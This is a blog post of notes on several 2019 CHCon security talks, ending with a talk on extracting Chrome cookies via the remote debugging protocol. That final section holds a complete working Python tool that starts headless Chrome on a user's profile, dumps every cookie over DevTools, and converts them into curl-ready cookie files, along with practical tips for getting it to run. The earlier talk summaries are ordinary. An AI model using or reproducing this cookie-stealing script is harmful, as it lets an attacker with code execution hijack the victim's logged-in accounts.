yojimbo

Thoughts that should have a longer lifetime than my Mastodon posts ...

CHCon BEN KNIGHT – CLASSIC PLAYSTATION HACKING, https://2019.chcon.nz/talks/ben/

The PlayStation Classic is a throwback to the original PSX; for the nostalgic types. Sony ships this cheap Linux box with an open source emulator to play 20 original PSX games. But wait, no Crash Team Racing? The PlayStation Classic has been out long enough that there’s plenty of tooling to load more games. But how do the tools work? What’s the hax? Ben will demonstrate the manual exploitation of the vulnerable update process. Flash storage was dumped, UART serial connected and crypto mistakes were made.

  • The box ships with the private key embedded, so anyone who dumps the flash has it. Why???
  • Also sounds like a fun box to play games from, if only I had more inputs on my TV ...

CHCon EDWARD ROBINSON – DISASSEMBLING DIABLO, https://2019.chcon.nz/talks/edward/

In this talk we will go through the fundamentals of game hacking using Diablo 1 to show entertaining examples. We’ll explore what happens when applications trust clients too much and discuss how carefully considering what your own applications interact with can be an eye-opening, and potentially scary, exercise.

  • A single-player game doesn't have to care about its attack surface; the same trust-the-client code in multiplayer lets anyone who edits memory on their own machine cheat everyone else.
  • Cool hacks turn into mods: Counter-Strike started life as a Half-Life mod

CHCon PETE NICHOLLS – BECOMING A SECURITY-CONSCIOUS SOFTWARE COMPANY, https://2019.chcon.nz/talks/pete-nicholls/

How do you adopt best security practices at your software development company? Earlier this year the company I work for decided to get serious about security, and gave me the task of figuring out how to do that. Here’s everything I wished I knew when I started.

  • “Buy, Measure, Bake & Share”
  • Metrics via OKRs (John Doerr, Measure What Matters)
  • Get buy-in, work out how to measure “improvement”, get everyone involved, and open-source your process
  • Don't dictate, give people tools to be responsible for getting better themselves

CHCon MATTHEW RUFFELL – THE STORY OF THE “UNCRACKABLE” LOCKBOX, AND WHY HACKERS NEED TO WORK ALONGSIDE DEVELOPERS, https://2019.chcon.nz/talks/matthew/

I was scrolling reddit, and a post came up from a developer with their own homemade encryption program. They issued a challenge: break open the time sensitive uncrackable Lockbox, and you will receive 0.02 BTC. Just in it for the entertainment of seeing how bad their encryption was going to be, I had the Lockbox open two hours later. I wrote up a blog post detailing how I managed to break in, and thus started a series of new challenges, each more complicated than the last, as I worked with the developer to strengthen their program. All challenges had the same thing in common: The developer kept making fundamental mistakes when it came to security, and I defeated five of his challenges with simple attacks straight from the security 101 textbook. In this talk, we will reverse engineer five versions of the TimeLock program, review the disassembly of simple vulnerabilities and use our debugger to exploit the program into revealing its secrets.

  • An excellent tale of how someone thought they could write a security-related program without understanding how attacks work, and how they were (co-operatively) educated by simple reverse engineering ...
  • Don't roll your own crypto code
  • Don't trust the machine your code is running on
  • Don't trust “the Internet” to tell the truth

CHCon MICHELLE BURKE – FOR GOOD OR EVIL: WHY DO YOU NEED MY DATA?, https://2019.chcon.nz/talks/michelle/

Our lives are lived increasingly inside the tubes of the internet and our data is flowing freely through it. Some of us have better opsec than others (and our families are probably terrible and don’t even understand what opsec means), but the applications we build for interacting with it often collect more than they need to. Are you actually doing the right thing or making the world a little worse?

  • Because too much data is being collected for “no valid purpose”, feel free to hand over details that don't uniquely identify you.
  • Who doesn't like to receive that store voucher addressed to “Dear Princess”, just in time for your seasonal/Christmas shopping sprees? You don't have to provide your real details.
  • Because some places that you “trust” make terrible mistakes (https://www.stuff.co.nz/national/health/115586450/new-zealand-depression-website-exposed-test-results-to-thirdparty-companies) and when they say “All user information collected on www.depression.org.nz is non-identifiable – no identifying information eg, names, email addresses etc are collected” they are forgetting the third-party tracking cookies, which link your visit to the details those companies already hold on you from other sites.

CHCon “ALEX” – STEALING CHROME COOKIES WITHOUT A PASSWORD, https://2019.chcon.nz/talks/alex/

If you steal someone’s Chrome cookies, you can log in to their accounts on every website they’re logged in to. Normally you need the user’s password to do it, but I found a way to do it without the password. You just need to be able to execute code on their computer. It works by using Chrome’s Remote Debugging Protocol. To my knowledge this is the only way to extract a user’s Chrome cookies without their password, and by far the easiest way. It involves plugging together several extremely forbidden and undocumented Chrome features, as well as figuring out how to speak the websocket protocol stealthily on a victim’s machine. This talk is about how the technique was found, how it works, and what you can do with it.

  • “Alex” (Purplecon organiser) has found a new way to get Google Chrome to give up its cookies, if you can run commands as the targeted user. https://mango.pdf.zone/stealing-chrome-cookies-without-a-password
  • TL;DR – Start a headless Chrome with --remote-debugging-port and --user-data-dir pointed at the same profile directory as the user's real GUI browser, then ask it over the DevTools (Remote Debugging) protocol for every cookie it holds. Chrome decrypts its own cookie store for you, so no password or keychain access is needed.
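The technique in prose form is short, but the moving parts (launch flags, a raw WebSocket client, the DevTools JSON-RPC call, and turning the reply into something curl can use) are easier to see in code. The script below is an added example for this post; it is not the talk's code, the mango.pdf.zone post's code, or anything from Chrome. The binary path, profile directory and port are assumptions, the reply in SAMPLE_REPLY is constructed rather than captured, and it assumes Chrome accepts a WebSocket upgrade that carries no Origin header (so the --remote-allow-origins check in newer Chrome does not apply). Everything else is the real DevTools protocol: /json lists targets, Network.getAllCookies returns the cookie jar.

```python
# Added example, not code from the talk, the mango.pdf.zone post or Chrome:
# start a headless Chrome on an existing profile, speak raw WebSocket to its
# DevTools endpoint and dump every cookie. CHROME/PROFILE/PORT are assumptions.
import json, os, socket, struct, subprocess, time, urllib.request

CHROME = "/usr/bin/google-chrome"                        # assumption
PROFILE = os.path.expanduser("~/.config/google-chrome")  # assumption: Linux default
PORT = 9222                                              # assumption: any free port

def chrome_args(chrome=CHROME, profile=PROFILE, port=PORT):
    return [chrome, "--headless", f"--remote-debugging-port={port}",
            f"--user-data-dir={profile}"]

def cdp_request(msg_id, method, params=None):
    # One DevTools JSON-RPC message; Network.getAllCookies needs no params.
    return json.dumps({"id": msg_id, "method": method,
                       **({"params": params} if params else {})}, separators=(",", ":"))

def ws_handshake(path, host, key="dGhlIHNhbXBsZSBub25jZQ=="):
    # Minimal RFC 6455 client upgrade; deliberately sends no Origin header.
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\nUpgrade: websocket\r\n"
            f"Connection: Upgrade\r\nSec-WebSocket-Key: {key}\r\n"
            f"Sec-WebSocket-Version: 13\r\n\r\n").encode()

def ws_text_frame(text, mask=None):
    # Client frames MUST be masked (RFC 6455 s5.3); mask is a parameter only
    # so the output can be checked deterministically.
    data = text.encode()
    mask = mask or os.urandom(4)
    n = len(data)
    if n < 126:
        header = bytes([0x81, 0x80 | n])
    elif n < 65536:
        header = bytes([0x81, 0x80 | 126]) + struct.pack(">H", n)
    else:
        header = bytes([0x81, 0x80 | 127]) + struct.pack(">Q", n)
    return header + mask + bytes(b ^ mask[i % 4] for i, b in enumerate(data))

def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("socket closed mid-frame")
        buf += chunk
    return buf

def ws_read_frame(sock):
    # One unmasked server frame; a cookie dump easily exceeds 64 KiB, so the
    # 16- and 64-bit length forms matter. Fragmented replies are not handled.
    n = _recv_exact(sock, 2)[1] & 0x7F
    if n == 126:
        n = struct.unpack(">H", _recv_exact(sock, 2))[0]
    elif n == 127:
        n = struct.unpack(">Q", _recv_exact(sock, 8))[0]
    return _recv_exact(sock, n)

def cookies_from_response(text):
    return json.loads(text)["result"]["cookies"]

def cookies_to_netscape(cookies):
    # Netscape cookies.txt, the format curl -b / wget --load-cookies accept.
    lines = ["# Netscape HTTP Cookie File"]
    for c in cookies:
        domain, expires = c["domain"], int(c.get("expires", -1))
        lines.append("\t".join([
            ("#HttpOnly_" if c.get("httpOnly") else "") + domain,
            "TRUE" if domain.startswith(".") else "FALSE",
            c.get("path", "/"), "TRUE" if c.get("secure") else "FALSE",
            str(expires if expires > 0 else 0),  # session cookie -> 0
            c["name"], c["value"]]))
    return "\n".join(lines) + "\n"

def dump_cookies(chrome=CHROME, profile=PROFILE, port=PORT):
    proc = subprocess.Popen(chrome_args(chrome, profile, port),
                            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    try:
        for _ in range(50):  # wait for the DevTools HTTP endpoint
            try:
                targets = json.load(urllib.request.urlopen(f"http://127.0.0.1:{port}/json"))
                break
            except OSError:
                time.sleep(0.2)
        else:
            raise RuntimeError("DevTools endpoint never came up")
        path = targets[0]["webSocketDebuggerUrl"].split(f":{port}", 1)[1]
        with socket.create_connection(("127.0.0.1", port)) as s:
            s.sendall(ws_handshake(path, f"127.0.0.1:{port}"))
            reply = b""
            while not reply.endswith(b"\r\n\r\n"):  # swallow the 101 response
                reply += _recv_exact(s, 1)
            s.sendall(ws_text_frame(cdp_request(1, "Network.getAllCookies")))
            return cookies_to_netscape(cookies_from_response(ws_read_frame(s).decode()))
    finally:
        proc.terminate()

# Constructed DevTools reply (not captured from a real browser) for offline use.
SAMPLE_REPLY = ('{"id":1,"result":{"cookies":[{"name":"SID","value":"abc123","domain":'
                '".example.com","path":"/","expires":1893456000.5,"httpOnly":true,'
                '"secure":true},{"name":"csrf","value":"x","domain":"app.example.org",'
                '"path":"/login","expires":-1,"httpOnly":false,"secure":false}]}}')

def demo():
    return cookies_to_netscape(cookies_from_response(SAMPLE_REPLY))

if __name__ == "__main__":
    print(dump_cookies() if os.path.exists(CHROME) else demo(), end="")
```

Two things to check before relying on this. Chrome holds a lock on the profile directory (SingletonLock on Linux), so test what happens when the GUI instance is already running and fall back to a copy of the profile if the headless one refuses to start. On the defensive side, a headless Chrome launched with --remote-debugging-port by anything other than Chrome itself is an unusual process tree and worth a detection rule.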

I've been to three NZ infosec conferences in the last couple of weeks, and I thought that documenting the talks and the notes that I took would be an interesting exercise. I originally put these notes on the internal company wiki, because they paid for me to go :–) but I figured there was no reason not to release them more widely ... So stay tuned for some more posts on the talks from 2019's CHCon, Purplecon and Kawaiicon!